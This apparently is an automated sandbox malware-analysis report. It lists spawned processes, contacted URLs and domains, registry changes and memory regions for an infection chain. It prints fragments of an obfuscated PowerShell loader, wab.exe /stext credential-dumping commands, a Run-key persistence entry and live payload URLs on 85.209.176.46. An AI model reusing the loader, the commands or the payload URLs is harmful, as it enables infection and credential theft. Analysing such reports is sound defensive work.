(Arkivkopie 'Fant$OvergSubtlAmbaoAnnubScoraSprilAqua:InkmAVetctTipstbenirKarniSognbAffiu PsatUdvlnMascaBril2 Kar Hyae= Til Nlde[TypoS FriyCymbsKombtKjelebyplm Sol.NemoTZitheTuinxChint Jat. AskERockn dimcRhinoDictdConsiCitenRighgFors]Catt:Nodd:UnesATrykS UdsCComaIDoysI Pro.TestGSjape XyltStriS AnvtSamfrDentiAmrenParogKvil(Serv$KassrGedeeBlsekudfrl LosaPrismCate) Mat ');Kultu (Arkivkopie 'calc$SandgTasklBraioPreabCortaReallPong:SpecARetvt UndtSnekrStabiBenbb MaauTegntIblanRegnaDiag3Klau=Ende$ phyA RugtPrint Woor fraiHampbStifuBucetPluknTricaPoie2Over. BaasMycou StrbTilgsSvmmtRevarFakti SwinPhysgFari(Copa2styr6Ordk4Ravn8Bugs8Selv4 Cos, Oma1retr9Over0Brod8saka0 Suf)Tmre ');Kultu $Attributna3;};;
malicious
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7288 -s 12
malicious
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7272 -s 12
malicious
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3324 -s 12
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wbvc
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wbvc
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zwauomm
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jqgfpewoff
malicious
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4560 -s 12
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ohhpmvctpkdbtqruwyovibylqayanbzqe
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qbmhno
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bdsaogxor
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe" /c "echo 1 && exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe" /c "echo 1 && exit
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe" /c "echo 1 && exit
There are 19 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://85.209.176.46/clino.ttf
85.209.176.46
malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://85.209.176.46/AIbTlARMalRGYMmJkhXeKMcq42.bin
85.209.176.46
malicious
http://85.209.176.46/zAOejBDvzeNzCmAWtEnz61.bin
85.209.176.46
malicious
http://geoplugin.net/json.gp
178.237.33.50
malicious
http://85.209.176.46/Soothing.hhk
85.209.176.46
malicious
http
malicious
http://85.209.176.46/clino.ttfhk
unknown
http://85.209.176.46/Soothing.hhkQ:
unknown
http://nuget.org/NuGet.exe
unknown
http://85.209.176.46/
unknown
http://crl.microsoft
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://85.209.176.46/d
unknown
https://go.micro
unknown
https://contoso.com/License
unknown
http://geoplugin.net/json.gpvG
unknown
https://contoso.com/Icon
unknown
http://ecox.pt/Soothing.hhk
unknown
https://github.com/Pester/Pester
unknown
http://85.209.176.46:80/clino.ttf
unknown
https://g.live.com/odclientsettings/Prod-C:
unknown
https://aka.ms/pscore6lB
unknown
http://85.209.176.46/zAOejBDvzeNzCmAWtEnz61.binEW
unknown
https://contoso.com/
unknown
https://g.live.com/odclientsettings/ProdV2-C:
unknown
https://nuget.org/nuget.exe
unknown
http://ecox.pt/Soothing.hhkH
unknown
http://crl.microz
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://85.209.176.46/Soothing.hhkse
unknown
There are 22 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
www.spirdrain.xyz
66.29.149.46
malicious
www.nasyoeastasia.org
unknown
malicious
www.liangyuen528.com
unknown
malicious
geoplugin.net
178.237.33.50
nasyoeastasia.org
192.185.129.44

IPs

IP
Domain
Country
Malicious
85.209.176.69
unknown
United Kingdom
malicious
85.209.176.46
unknown
United Kingdom
malicious
178.237.33.50
geoplugin.net
Netherlands
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_CURRENT_USER\Chinagruel
Idoisme
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Ernrin
HKEY_CURRENT_USER\Environment
Wirlasa
HKEY_CURRENT_USER\SOFTWARE\lipegtst-A9RE3F
exepath
HKEY_CURRENT_USER\SOFTWARE\lipegtst-A9RE3F
licence
HKEY_CURRENT_USER\SOFTWARE\lipegtst-A9RE3F
time
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany

Memdumps

Base Address
Regiontype
Protect
Malicious
23151000
direct allocation
page execute and read and write
malicious
9949000
direct allocation
page execute and read and write
malicious
AD1F000
direct allocation
page execute and read and write
malicious
5726000
trusted library allocation
page read and write
malicious
9080000
direct allocation
page execute and read and write
malicious
8590000
direct allocation
page execute and read and write
malicious
6217000
trusted library allocation
page read and write
malicious
3493000
trusted library allocation
page execute and read and write
B32E5FB000
stack
page read and write
7FF7C1320000
trusted library allocation
page execute and read and write
3440000
heap
page read and write
212A0000
direct allocation
page read and write
27201E9B000
heap
page read and write
1E63F41D000
heap
page read and write
2B3D000
heap
page read and write
305C000
stack
page read and write
27203642000
heap
page read and write
9140000
direct allocation
page read and write
2846000
heap
page read and write
35CE000
heap
page read and write
B32D87E000
stack
page read and write
613A000
heap
page read and write
6E70000
direct allocation
page read and write
6E80000
direct allocation
page read and write
3490000
trusted library allocation
page read and write
3630000
heap
page read and write
61B5000
heap
page read and write
34F0000
trusted library allocation
page read and write
1E639EB2000
heap
page read and write
1FC06084000
heap
page read and write
22D00000
unclassified section
page execute and read and write
37FB000
heap
page read and write
1FC079D0000
heap
page read and write
61C1000
heap
page read and write
422000
system
page execute and read and write
30FF000
remote allocation
page execute and read and write
2B17000
heap
page read and write
34B0000
trusted library allocation
page read and write
1E63F200000
trusted library allocation
page read and write
2895000
heap
page read and write
1E639E13000
heap
page read and write
616C000
heap
page read and write
2AD4000
heap
page read and write
4580000
heap
page read and write
22141000
heap
page read and write
27201C17000
heap
page read and write
616C000
heap
page read and write
B80000
heap
page read and write
4430000
heap
page execute and read and write
834E000
stack
page read and write
501E000
stack
page read and write
2B26000
heap
page read and write
1E63A400000
heap
page read and write
44ED000
stack
page read and write
2B23000
heap
page read and write
27203645000
heap
page read and write
400000
system
page execute and read and write
455000
system
page execute and read and write
1FC09879000
trusted library allocation
page read and write
7C40000
trusted library allocation
page read and write
22C35000
unclassified section
page execute and read and write
6955000
heap
page execute and read and write
3530000
heap
page read and write
22B10000
unclassified section
page execute and read and write
1FB6C7B0000
heap
page read and write
27201C40000
heap
page read and write
27201C43000
heap
page read and write
560000
unclassified section
page readonly
2A78000
heap
page read and write
64D0000
heap
page read and write
56EC000
stack
page read and write
1E639C20000
heap
page read and write
B32DBFE000
unkown
page readonly
2A5E000
stack
page read and write
3494000
trusted library allocation
page read and write
1E63F350000
trusted library allocation
page read and write
4BD1000
heap
page read and write
A9E000
stack
page read and write
88B0000
trusted library allocation
page read and write
2B5B000
heap
page read and write
7FF7C14F0000
trusted library allocation
page read and write
37F0000
heap
page read and write
8990000
trusted library allocation
page read and write
27203B13000
heap
page read and write
7510000
direct allocation
page read and write
33E0000
heap
page read and write
6161000
heap
page read and write
7420000
trusted library allocation
page read and write
27203AF1000
heap
page read and write
23096000
unclassified section
page execute and read and write
21230000
direct allocation
page read and write
6950000
heap
page execute and read and write
1FC0602D000
heap
page read and write
7FF7C14B0000
trusted library allocation
page read and write
8500000
trusted library allocation
page execute and read and write
2B3E000
heap
page read and write
D30000
unclassified section
page readonly
229B5000
unclassified section
page execute and read and write
22BE0000
unclassified section
page execute and read and write
22E60000
unclassified section
page execute and read and write
1E639E9B000
heap
page read and write
27201BAB000
heap
page read and write
1E63A390000
trusted library allocation
page read and write
2B17000
heap
page read and write
1FC098A9000
trusted library allocation
page read and write
21E41000
heap
page read and write
23F0000
heap
page read and write
2B06000
heap
page read and write
27201C21000
heap
page read and write
618D000
heap
page read and write
1E63A51A000
heap
page read and write
218D0000
heap
page read and write
1FC06043000
heap
page read and write
317E000
stack
page read and write
497E000
stack
page read and write
28DE000
stack
page read and write
77A0000
heap
page read and write
23180000
heap
page read and write
1FB6C740000
heap
page read and write
2175D000
stack
page read and write
2B0B000
heap
page read and write
212D0000
direct allocation
page read and write
1FC06397000
heap
page read and write
54B5000
heap
page read and write
600000
unclassified section
page readonly
1E639EB4000
heap
page read and write
2B4B000
heap
page read and write
89F6000
heap
page read and write
73B0000
trusted library allocation
page read and write
27201C44000
heap
page read and write
1FC060AD000
heap
page read and write
1E63F41D000
heap
page read and write
27201C08000
heap
page read and write
1FC2003E000
heap
page read and write
7CFE000
stack
page read and write
27201C3F000
heap
page read and write
22CF6000
unclassified section
page execute and read and write
1FC20290000
heap
page read and write
2B2B000
heap
page read and write
1FC1FF92000
heap
page read and write
34AD000
trusted library allocation
page execute and read and write
1E639E6E000
heap
page read and write
7FF7C12E6000
trusted library allocation
page execute and read and write
337E000
stack
page read and write
2181D000
stack
page read and write
422000
system
page execute and read and write
22418000
heap
page read and write
21CBF000
stack
page read and write
21B7C000
stack
page read and write
22780000
unclassified section
page execute and read and write
70F4000
heap
page read and write
801A000
heap
page read and write
22750000
unclassified section
page execute and read and write
46AE000
trusted library allocation
page read and write
B32E77E000
stack
page read and write
27201BF6000
heap
page read and write
7DD0000
trusted library allocation
page read and write
2BC0000
trusted library allocation
page read and write
1FC060B2000
heap
page read and write
74F0000
direct allocation
page read and write
6D98000
heap
page read and write
CB49000
direct allocation
page execute and read and write
2AD4000
heap
page read and write
B32F1FE000
unkown
page readonly
2A70000
trusted library section
page read and write
1FC08069000
trusted library allocation
page read and write
7B19000
heap
page read and write
2FBD000
stack
page read and write
7FF7C1460000
trusted library allocation
page read and write
1FC0606C000
heap
page read and write
6FA2000
heap
page read and write
7FE8000
heap
page read and write
61C9000
trusted library allocation
page read and write
1FC1FB40000
heap
page read and write
7CBE000
stack
page read and write
230B0000
unclassified section
page execute and read and write
27203647000
heap
page read and write
2B19000
heap
page read and write
60D58FD000
stack
page read and write
89A0000
heap
page read and write
7DB0000
trusted library allocation
page read and write
7D90000
trusted library allocation
page read and write
2B94000
trusted library allocation
page read and write
893E000
stack
page read and write
7530000
direct allocation
page read and write
54B2000
heap
page read and write
3480000
trusted library allocation
page read and write
22FE0000
unclassified section
page execute and read and write
60D6B8B000
stack
page read and write
400000
system
page execute and read and write
614B000
heap
page read and write
227E0000
unclassified section
page execute and read and write
27201C6F000
heap
page read and write
2BE0000
trusted library allocation
page read and write
1FC20065000
heap
page read and write
22F85000
unclassified section
page execute and read and write
FFFC1FD000
stack
page read and write
7B00000
direct allocation
page read and write
1E63F340000
trusted library allocation
page read and write
FFFB71A000
stack
page read and write
23C0000
unclassified section
page readonly
8580000
trusted library allocation
page execute and read and write
27203645000
heap
page read and write
2B49000
heap
page read and write
6B40000
direct allocation
page read and write
1E639E74000
heap
page read and write
1E63AD80000
trusted library section
page readonly
27201C49000
heap
page read and write
1E63A55B000
heap
page read and write
27203B1F000
heap
page read and write
7FF7C12C0000
trusted library allocation
page execute and read and write
7E70000
heap
page read and write
1E63F24F000
trusted library allocation
page read and write
21E36000
unclassified section
page execute and read and write
2DDE000
stack
page read and write
64D7000
heap
page read and write
1E63F224000
trusted library allocation
page read and write
6D70000
heap
page read and write
223C0000
heap
page read and write
27201C1F000
heap
page read and write
B32DDFE000
stack
page read and write
2A91000
heap
page read and write
60E8000
heap
page read and write
2B31000
heap
page read and write
6EA0000
direct allocation
page read and write
1E63ACA0000
trusted library allocation
page read and write
70D8000
heap
page read and write
2B68000
heap
page read and write
7EE0000
trusted library allocation
page read and write
2840000
heap
page read and write
2B58000
heap
page read and write
910000
unclassified section
page readonly
B32EEFE000
unkown
page readonly
21E40000
heap
page read and write
5A82000
trusted library allocation
page read and write
4D0E000
stack
page read and write
5721000
trusted library allocation
page read and write
1FC09469000
trusted library allocation
page read and write
8510000
trusted library allocation
page read and write
2B44000
heap
page read and write
7E20000
trusted library allocation
page read and write
1E63AA40000
trusted library allocation
page read and write
1FC06066000
heap
page read and write
8C1C000
stack
page read and write
6AAD000
stack
page read and write
D40000
heap
page read and write
1FC07D71000
trusted library allocation
page read and write
615B000
heap
page read and write
2B1F000
heap
page read and write
2AFA000
heap
page read and write
7FF7C1440000
trusted library allocation
page read and write
7FF7C1500000
trusted library allocation
page read and write
6B10000
direct allocation
page read and write
615B000
heap
page read and write
1FC07FA0000
trusted library allocation
page read and write
4DE4000
trusted library allocation
page read and write
27201C21000
heap
page read and write
22340000
heap
page read and write
58FF000
remote allocation
page execute and read and write
21ABE000
stack
page read and write
1E63F1E9000
trusted library allocation
page read and write
228D0000
unclassified section
page execute and read and write
1FB6C560000
heap
page read and write
7E10000
trusted library allocation
page read and write
B32E8FE000
unkown
page readonly
22BC6000
unclassified section
page execute and read and write
22860000
unclassified section
page execute and read and write
1E63F440000
heap
page read and write
81C5000
trusted library allocation
page read and write
21C7D000
stack
page read and write
1FC05FC0000
heap
page read and write
1E63F499000
heap
page read and write
7BAB000
trusted library allocation
page read and write
D549000
direct allocation
page execute and read and write
2B2F000
heap
page read and write
2AEF000
heap
page read and write
1E63A791000
trusted library allocation
page read and write
1E63F220000
trusted library allocation
page read and write
1FC05FB0000
heap
page read and write
55B9000
trusted library allocation
page read and write
27201C08000
heap
page read and write
1FC094D9000
trusted library allocation
page read and write
27201BE1000
heap
page read and write
2AD4000
heap
page read and write
72EF000
stack
page read and write
223E7000
heap
page read and write
34C8000
heap
page read and write
27201C08000
heap
page read and write
2720364C000
heap
page read and write
359C000
heap
page read and write
1E63ADD0000
trusted library section
page readonly
2171F000
stack
page read and write
52BF000
trusted library allocation
page read and write
27203780000
heap
page read and write
8880000
heap
page read and write
21BBF000
stack
page read and write
212B0000
direct allocation
page read and write
7B90000
trusted library allocation
page read and write
21FD0000
heap
page read and write
4F9E000
stack
page read and write
B32F5FE000
unkown
page readonly
B32E87E000
stack
page read and write
6B00000
direct allocation
page read and write
27201C27000
heap
page read and write
440F000
stack
page read and write
1E63A402000
heap
page read and write
7FF7C13C0000
trusted library allocation
page execute and read and write
60D5CFE000
stack
page read and write
44FF000
remote allocation
page execute and read and write
4BED000
heap
page read and write
1FC202BD000
heap
page read and write
2AEF000
heap
page read and write
1E63F330000
trusted library allocation
page read and write
7FF7C14D0000
trusted library allocation
page read and write
2A90000
heap
page read and write
400000
system
page execute and read and write
27201C69000
heap
page read and write
2B19000
heap
page read and write
1E63F416000
heap
page read and write
991F000
direct allocation
page execute and read and write
7200000
trusted library allocation
page read and write
6170000
heap
page read and write
342E000
stack
page read and write
1FC07BC7000
trusted library allocation
page read and write
27201C5E000
heap
page read and write
27201C6C000
heap
page read and write
27201C63000
heap
page read and write
509F000
stack
page read and write
7D3E000
stack
page read and write
7520000
direct allocation
page read and write
1FC202F5000
heap
page read and write
6192000
heap
page read and write
4CD8000
trusted library allocation
page read and write
801E000
heap
page read and write
8970000
trusted library allocation
page read and write
B32EB7E000
stack
page read and write
7090000
heap
page read and write
1E63F1D0000
trusted library allocation
page read and write
7FF7C14C0000
trusted library allocation
page read and write
1FC06064000
heap
page read and write
6CEB000
stack
page read and write
1FC20160000
heap
page execute and read and write
2B04000
heap
page read and write
27201AF0000
heap
page read and write
21260000
direct allocation
page read and write
7DF0000
trusted library allocation
page read and write
29D0000
heap
page read and write
5110000
heap
page execute and read and write
B32D56B000
stack
page read and write
455E000
stack
page read and write
70E8000
heap
page read and write
1E639E0B000
heap
page read and write
1FC0611E000
heap
page read and write
7380000
trusted library allocation
page read and write
7FF7C13E2000
trusted library allocation
page read and write
1FC1FFE3000
heap
page read and write
1FC06390000
heap
page read and write
27201B92000
heap
page read and write
7ACF000
heap
page read and write
1E63A513000
heap
page read and write
4ACE000
stack
page read and write
1FC06020000
heap
page read and write
27201C40000
heap
page read and write
6E90000
direct allocation
page read and write
61B5000
heap
page read and write
7FF7C13D0000
trusted library allocation
page execute and read and write
1E639E8C000
heap
page read and write
27201C0C000
heap
page read and write
3460000
trusted library section
page read and write
54D7000
heap
page read and write
2300000
unclassified section
page readonly
1FC08065000
trusted library allocation
page read and write
476000
system
page execute and read and write
8960000
trusted library allocation
page read and write
1FC20120000
heap
page execute and read and write
27201C27000
heap
page read and write
6174000
heap
page read and write
73E0000
trusted library allocation
page read and write
6F2E000
stack
page read and write
27201BF6000
heap
page read and write
2AF7000
heap
page read and write
2958000
heap
page read and write
616C000
heap
page read and write
6030000
heap
page read and write
27201C17000
heap
page read and write
27201B89000
heap
page read and write
8C30000
trusted library allocation
page execute and read and write
21A3D000
stack
page read and write
7AF7000
heap
page read and write
27201C0C000
heap
page read and write
8870000
heap
page read and write
1FC06036000
heap
page read and write
2849000
heap
page read and write
2B17000
heap
page read and write
1E63F400000
heap
page read and write
7FF7C1570000
trusted library allocation
page read and write
223E7000
heap
page read and write
717C000
heap
page read and write
22FC2000
unclassified section
page execute and read and write
229F2000
unclassified section
page execute and read and write
747C000
stack
page read and write
2AF7000
heap
page read and write
7220000
trusted library allocation
page read and write
27201C66000
heap
page read and write
A5E000
unkown
page read and write
1FC201B5000
heap
page read and write
1FC17BB3000
trusted library allocation
page read and write
7FF7C1480000
trusted library allocation
page read and write
2B48000
heap
page read and write
2CEC000
stack
page read and write
54B0000
heap
page read and write
89A6000
heap
page read and write
740000
heap
page read and write
2B68000
heap
page read and write
1FC1FF90000
heap
page read and write
6123000
heap
page read and write
323C000
stack
page read and write
27201C31000
heap
page read and write
7AF0000
heap
page readonly
1E639EA1000
heap
page read and write
1E639EB9000
heap
page read and write
1E63F150000
trusted library allocation
page read and write
7500000
direct allocation
page read and write
2B14000
heap
page read and write
694E000
stack
page read and write
B32DEFE000
unkown
page readonly
2222D000
heap
page read and write
2D4C000
stack
page read and write
27201C6E000
heap
page read and write
280E000
stack
page read and write
B32EA7E000
stack
page read and write
6000000
unclassified section
page readonly
2B93000
trusted library allocation
page execute and read and write
616C000
heap
page read and write
2A40000
remote allocation
page read and write
22A86000
unclassified section
page execute and read and write
FFFBBFE000
stack
page read and write
34A0000
trusted library allocation
page read and write
55EC000
stack
page read and write
B8C000
heap
page read and write
8840000
trusted library allocation
page read and write
223E7000
heap
page read and write
2B19000
heap
page read and write
27201C08000
heap
page read and write
21280000
direct allocation
page read and write
1E63F330000
trusted library allocation
page read and write
22AF5000
unclassified section
page execute and read and write
1FC202CC000
heap
page read and write
2A8B000
heap
page read and write
441E000
stack
page read and write
27201BF6000
heap
page read and write
22B50000
unclassified section
page execute and read and write
A349000
direct allocation
page execute and read and write
21EB7000
heap
page read and write
699F000
stack
page read and write
2B41000
heap
page read and write
22C72000
unclassified section
page execute and read and write
3627000
heap
page read and write
60D597E000
stack
page read and write
1E63F410000
heap
page read and write
1E639F13000
heap
page read and write
2720364C000
heap
page read and write
2AEF000
heap
page read and write
60D5C7F000
stack
page read and write
2AF8000
heap
page read and write
8FD0000
trusted library allocation
page read and write
1E63A3A0000
trusted library section
page read and write
23002000
unclassified section
page execute and read and write
212C0000
direct allocation
page read and write
1FC202B3000
heap
page read and write
27201C6B000
heap
page read and write
212F0000
direct allocation
page read and write
1FB6C760000
heap
page read and write
299D000
stack
page read and write
21A7D000
stack
page read and write
27201C17000
heap
page read and write
71A7000
trusted library allocation
page read and write
400000
system
page execute and read and write
27201C2F000
heap
page read and write
1E63F1E1000
trusted library allocation
page read and write
455000
system
page execute and read and write
1E63F380000
remote allocation
page read and write
1FC0611B000
heap
page read and write
2B2B000
heap
page read and write
1FC06068000
heap
page read and write
2B0F000
heap
page read and write
7FF7C121B000
trusted library allocation
page read and write
2FD0000
heap
page read and write
27201C40000
heap
page read and write
2B2C000
heap
page read and write
1FC07A50000
trusted library allocation
page read and write
7540000
direct allocation
page read and write
7FF7C1560000
trusted library allocation
page read and write
27201C57000
heap
page read and write
8A38000
heap
page read and write
455000
system
page execute and read and write
30F0000
remote allocation
page read and write
22F16000
unclassified section
page execute and read and write
7E20000
trusted library allocation
page execute and read and write
2AA0000
heap
page read and write
37C000
stack
page read and write
1E63F310000
trusted library allocation
page read and write
8F1F000
direct allocation
page execute and read and write
1E63F462000
heap
page read and write
1FC08A69000
trusted library allocation
page read and write
1E63A59D000
heap
page read and write
8A02000
heap
page read and write
1FC07A20000
heap
page readonly
6D8A000
heap
page read and write
7FF7C1204000
trusted library allocation
page read and write
21310000
direct allocation
page read and write
2B2A000
heap
page read and write
B32D9FE000
stack
page read and write
21BFD000
stack
page read and write
8D5E000
stack
page read and write
22DD6000
unclassified section
page execute and read and write
22341000
heap
page read and write
27203641000
heap
page read and write
2BAD000
trusted library allocation
page execute and read and write
1FC202C7000
heap
page read and write
7FF7C13B1000
trusted library allocation
page read and write
37AE000
stack
page read and write
2AF6000
heap
page read and write
6F6F000
stack
page read and write
505E000
stack
page read and write
69DE000
stack
page read and write
26FB000
stack
page read and write
2B10000
heap
page read and write
71A0000
trusted library allocation
page read and write
88A0000
trusted library allocation
page execute and read and write
718C000
heap
page read and write
6161000
heap
page read and write
221B7000
heap
page read and write
27203B0E000
heap
page read and write
2BC2000
trusted library allocation
page read and write
7F8E000
stack
page read and write
2BA0000
trusted library allocation
page read and write
1E63F25A000
trusted library allocation
page read and write
7FF7C1410000
trusted library allocation
page read and write
1E63B121000
trusted library allocation
page read and write
7FF7C1203000
trusted library allocation
page execute and read and write
2B29000
heap
page read and write
4500000
trusted library allocation
page read and write
21300000
direct allocation
page read and write
721D000
trusted library allocation
page read and write
3612000
heap
page read and write
313E000
unkown
page read and write
223E7000
heap
page read and write
736D000
stack
page read and write
8FD000
stack
page read and write
6156000
heap
page read and write
27201C24000
heap
page read and write
1E63F45B000
heap
page read and write
7C50000
trusted library allocation
page read and write
27201E9A000
heap
page read and write
2A70000
heap
page read and write
27201C1C000
heap
page read and write
7FF7C12B0000
trusted library allocation
page read and write
1FC2030A000
heap
page read and write
1FC09882000
trusted library allocation
page read and write
2B47000
heap
page read and write
615B000
heap
page read and write
2BBA000
trusted library allocation
page execute and read and write
7790000
heap
page read and write
1E639E2B000
heap
page read and write
90C0000
direct allocation
page read and write
72AE000
stack
page read and write
4EFF000
remote allocation
page execute and read and write
27201AC0000
heap
page read and write
1E639E5C000
heap
page read and write
299F000
stack
page read and write
FFFBFFF000
stack
page read and write
7AAA000
heap
page read and write
216DE000
stack
page read and write
7AE3000
heap
page read and write
400000
system
page execute and read and write
8807000
stack
page read and write
60D5873000
stack
page read and write
7FE4000
heap
page read and write
288E000
stack
page read and write
8FE0000
trusted library allocation
page read and write
1E63F380000
remote allocation
page read and write
7FA2000
heap
page read and write
7E10000
heap
page read and write
4591000
trusted library allocation
page read and write
22E45000
unclassified section
page execute and read and write
2AAB000
heap
page read and write
2AFB000
heap
page read and write
60D60BE000
stack
page read and write
838C000
stack
page read and write
27201BBF000
heap
page read and write
FFFC0FE000
stack
page read and write
2B44000
heap
page read and write
617B000
heap
page read and write
1E63F465000
heap
page read and write
8227000
trusted library allocation
page read and write
2B17000
heap
page read and write
30FD000
stack
page read and write
7F00000
heap
page read and write
2DD0000
heap
page read and write
1E63A55B000
heap
page read and write
2B90000
trusted library allocation
page read and write
7F4D000
stack
page read and write
4FDE000
stack
page read and write
615B000
heap
page read and write
1FC07B30000
heap
page read and write
2720364C000
heap
page read and write
3750000
trusted library allocation
page read and write
2D9C000
stack
page read and write
1FB6C56B000
heap
page read and write
400000
system
page execute and read and write
21270000
direct allocation
page read and write
820C000
stack
page read and write
509F000
stack
page read and write
2890000
heap
page read and write
22C80000
unclassified section
page execute and read and write
7DE0000
trusted library allocation
page read and write
60B5000
unclassified section
page execute and read and write
60D5A7F000
stack
page read and write
6BAD000
stack
page read and write
A31F000
direct allocation
page execute and read and write
1FC07A80000
trusted library allocation
page read and write
614B000
heap
page read and write
1E63F210000
trusted library allocation
page read and write
71F0000
trusted library allocation
page read and write
4E0F000
stack
page read and write
62B0000
unclassified section
page execute and read and write
B32EBFE000
unkown
page readonly
219FC000
stack
page read and write
8820000
trusted library allocation
page execute and read and write
7FF7C1200000
trusted library allocation
page read and write
7FF7C1550000
trusted library allocation
page read and write
1FC20600000
heap
page read and write
1E63ADC0000
trusted library section
page readonly
22A10000
unclassified section
page execute and read and write
FFFBAFE000
stack
page read and write
27201C44000
heap
page read and write
1E63A500000
heap
page read and write
27201C4E000
heap
page read and write
2B0E000
heap
page read and write
2B4A000
heap
page read and write
27201BB0000
heap
page read and write
44AC000
stack
page read and write
6212000
trusted library allocation
page read and write
7FF7C1510000
trusted library allocation
page read and write
1E639F29000
heap
page read and write
90B0000
trusted library allocation
page execute and read and write
31B0000
heap
page read and write
68C000
stack
page read and write
2179B000
stack
page read and write
1FC2005D000
heap
page read and write
21290000
direct allocation
page read and write
1E63F2B0000
trusted library allocation
page read and write
3607000
heap
page read and write
1E63F1C0000
trusted library allocation
page read and write
700000
unclassified section
page readonly
7B20000
trusted library allocation
page read and write
6AEB000
stack
page read and write
7AFD000
heap
page read and write
6B50000
direct allocation
page read and write
6C8000
stack
page read and write
C70000
unclassified section
page readonly
55FB000
trusted library allocation
page read and write
5CDE000
trusted library allocation
page read and write
212E0000
direct allocation
page read and write
AD49000
direct allocation
page execute and read and write
74E0000
direct allocation
page read and write
60D6C0B000
stack
page read and write
50F0000
heap
page read and write
23020000
unclassified section
page execute and read and write
79A1000
heap
page read and write
61B5000
heap
page read and write
1E63ADA0000
trusted library section
page readonly
21B3E000
stack
page read and write
3500000
heap
page readonly
60E0000
heap
page read and write
1FC07A40000
heap
page execute and read and write
5A98000
trusted library allocation
page read and write
1FB6C7C0000
heap
page read and write
6D80000
heap
page read and write
6192000
heap
page read and write
7FF7C1520000
trusted library allocation
page read and write
2BC5000
trusted library allocation
page execute and read and write
27201C17000
heap
page read and write
22140000
heap
page read and write
6209000
trusted library allocation
page read and write
7150000
heap
page read and write
33E8000
heap
page read and write
22FA0000
unclassified section
page execute and read and write
27203647000
heap
page read and write
6B20000
direct allocation
page read and write
27203652000
heap
page read and write
71B0000
heap
page execute and read and write
2B4F000
heap
page read and write
60D5FBE000
stack
page read and write
550000
unclassified section
page readonly
7EAA000
trusted library allocation
page read and write
2810000
heap
page read and write
1E63F320000
trusted library allocation
page read and write
6B30000
direct allocation
page read and write
2B17000
heap
page read and write
2B9D000
trusted library allocation
page execute and read and write
6CAD000
stack
page read and write
7DC0000
trusted library allocation
page read and write
229D0000
unclassified section
page execute and read and write
1E63F2C0000
trusted library allocation
page read and write
1E639E8A000
heap
page read and write
2B19000
heap
page read and write
7A90000
heap
page read and write
2B3D000
heap
page read and write
2A40000
heap
page read and write
2DE0000
heap
page read and write
732E000
stack
page read and write
1E639E78000
heap
page read and write
27201C1D000
heap
page read and write
7FD8000
heap
page read and write
1E63F1E7000
trusted library allocation
page read and write
7FF7C1540000
trusted library allocation
page read and write
616C000
heap
page read and write
7B82000
heap
page read and write
73D0000
trusted library allocation
page read and write
6192000
heap
page read and write
7FF0000
heap
page read and write
1FC20050000
heap
page read and write
4A7F000
stack
page read and write
2B07000
heap
page read and write
21240000
direct allocation
page read and write
60D5BFE000
stack
page read and write
1FC05FE0000
heap
page read and write
2846000
heap
page read and write
7BC0000
trusted library allocation
page read and write
400000
system
page execute and read and write
357E000
stack
page read and write
223B6000
heap
page read and write
7230000
trusted library allocation
page read and write
2FCF000
stack
page read and write
2236E000
heap
page read and write
22D55000
unclassified section
page execute and read and write
27201C71000
heap
page read and write
1E639E90000
heap
page read and write
2A1E000
stack
page read and write
7390000
trusted library allocation
page read and write
35C2000
heap
page read and write
22341000
heap
page read and write
422000
system
page execute and read and write
34D2000
trusted library allocation
page read and write
1E63F42A000
heap
page read and write
8560000
trusted library allocation
page read and write
2B08000
heap
page read and write
1E63F210000
trusted library allocation
page read and write
370C000
stack
page read and write
7BA0000
trusted library allocation
page read and write
5140000
direct allocation
page read and write
1E63A55C000
heap
page read and write
3380000
heap
page read and write
400000
system
page execute and read and write
7FF7C13F0000
trusted library allocation
page execute and read and write
218CF000
stack
page read and write
7EF0000
trusted library allocation
page read and write
